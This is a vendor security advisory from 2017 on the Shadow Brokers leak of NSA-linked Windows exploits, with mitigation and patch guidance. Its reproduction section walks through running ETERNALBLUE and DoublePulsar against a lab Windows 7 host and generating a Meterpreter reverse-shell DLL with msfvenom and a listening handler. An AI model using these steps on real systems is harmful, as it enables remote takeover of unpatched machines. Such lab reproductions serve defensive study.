您的需求已经提交,我们将在48小时内联系您
全国服务热线:400-1000-221
确定
免费享受企业级云安全服务
获取手机验证码
{{message}}
免费试用

【高危预警】Shadow broker泄露机密文件始末及技术分析

作者:
发布时间:2017-04-17

早在2016年,黑客组织 Shadow Brokers声称攻破了为NSA开发网络武器的美国黑客团队Equation Group,并公开拍卖据称为美国政府使用的黑客工具。

为了证明自己的说法,Shadow Brokers贴出似乎为针对路由器安全软件的攻击代码。该组织表示,如果得到100万比特币(现价约合5.68亿美元),将公开这些工具(它的比特币地址目前只有0.12 BTC)。

网络安全专家怀疑该组织是否获得了其所宣称的黑客工具,不过几位专家称,该组织所公布的代码看起来像是真的。该事件对五家路由器制造商造成影响,即三家美国公司──思科、瞻博网络(Juniper)、Fortinet和两家中国公司── 西网云信息技术有限公司、北京天融信网络安全技术有限公司。

北京时间2017年4月14日夜间,该组织在多次出售无果的情况下再次放出EQGRP_Lost_in_Translation文件,该文件包括多个Windows 0day,0day多为远程利用,评级为严重,可以覆盖大部分windows服务器。

历史回溯

2016年8月

释放“eqgrp-free-file.tar.xz.gpg“和”eqgrp-auction-file.tar.xz.gpg“两个文件,其中提供了第一个a文件的密码

2017年4月9日

“eqgrp-auction-file.tar.xz.gpg”文件解开密码

2017年4月14日

再次释放“EQGRP_Lost_in_Translation”文件

事件分析

这次的文件有三个目录,分别为“Windows”、“Swift” 和 “OddJob”,包含一堆令人震撼的黑客工具(我们挑几个重要的列举如下):

1、EXPLODINGCAN 是 IIS 6.0 远程漏洞利用工具。

2、ETERNALROMANCE 是 SMB1 的重量级利用,可以攻击开放了 445 端口的 Windows XP, 2003, Vista, 7, Windows 8, 2008, 2008 R2 并提升至系统权限。

3、除此之外 ERRATICGOPHER 、ETERNALBLUE 、ETERNALSYNERGY 、

ETERNALCHAMPION 、EDUCATEDSCHOLAR、 EMERALDTHREAD 等都是 SMB 漏洞利用程序,可以攻击开放了 445 端口的 Windows 机器。

4、ESTEEMAUDIT 是 RDP 服务的远程漏洞利用工具,可以攻击开放了3389 端口且开启了智能卡登陆的 Windows XP 和 Windows 2003 机器。

5、FUZZBUNCH 是一个类似 MetaSploit 的漏洞利用平台。

6、ODDJOB 是无法被杀毒软件检测的 Rootkit 利用工具。

7、ECLIPSEDWING 是 Windows 服务器的远程漏洞利用工具。

8、ESKIMOROLL 是 Kerberos 的漏洞利用攻击,可以攻击 Windows

2000/2003/2008/2008 R2 的域控制器。

复现过程

环境搭建

注意,必须按照python2.6相关版本,其他版本不奏效。

下载python2.6并安装

下载pywin32并安装

将C:\Python26添加到环境变量PATH中。

配置环境

将EQGRP_Lost_in_Translation下载到的文件解压,找到\windows\fb.py,将,下图中两个部分注释掉。

实验环境

攻击机1:192.168.71.133,winserver 2008,32bit

攻击机2:192.168.71.130 kali2

靶机:192.168.199.107,win7 64bit

利用步骤

在靶机1(192.168.71.133)中安装好python、pywin32以及NSA工具,在

C:\shadowbroker-master\windows 中执行fb.py:

分别设置攻击IP地址192.168.199.107,回调地址192.168.71.133(攻击机1),关闭重定向,设置日志路径,新建或选择一个project:

接下来输入命令:

useETERNALBLUE

依次填入相关参数,超时时间等默认参数可以直接回车:

由于靶机是win7 系统,在目标系统信息处选择1:win72k8r2

模式选1:FB

确认信息,执行

成功后,接着运行use Doublepulsar:

并依次填入参数,注意在function处选择2,rundll

同时在攻击机2 kali的msfvenom 生成攻击dll:

msfvenom -pwindows/x64/meterpreter/reverse_tcp LHOST=192.168.71.130LPORT=5555 -f dll > go.dll

接着执行:

$ msfconsole

msf > useexploit/multi/handler

msf > set LHOST192.168.71.130

msf > set LPORT 5555

msf > set PAYLOADwindows/x64/meterpreter/reverse_tcp

msf > exploit

同时将生成的go.dll上传到攻击机1(192.168.71.133),回到攻击机1,填入攻击dll路径:

接下来一路回车,执行攻击

回到kali,获得shell,攻击成功:

修复方案

1.临时规避措施:关闭135、137、139、445,3389端口开放到外网。推荐使用安全组策略禁止135.137.139.445端口;3389端口限制只允许特定IP访问。

2.及时到微软官网下载补丁升级,微软官方公告连接:

https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/

微软已经发出通告 ,强烈建议用户更新最新补丁:

MS17-010 : 严重 - Microsoft Windows SMB 服务器安全更新 (4013389)

https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx

MS14-068 :严重 - Kerberos 漏洞可能允许特权提升 (3011780)

https://technet.microsoft.com/library/security/MS14-068

MS10-061:严重 - 打印后台程序服务中的漏洞可能允许远程执行代码

https://technet.microsoft.com/library/security/ms10-061

MS09-050 :严重 - SMBv2 中的漏洞可能允许远程执行代码 (975517)

https://technet.microsoft.com/library/security/ms09-050

MS08-067 :严重 - 服务器服务中的漏洞可能允许远程执行代码 (958644)

https://technet.microsoft.com/library/security/ms08-067

标签: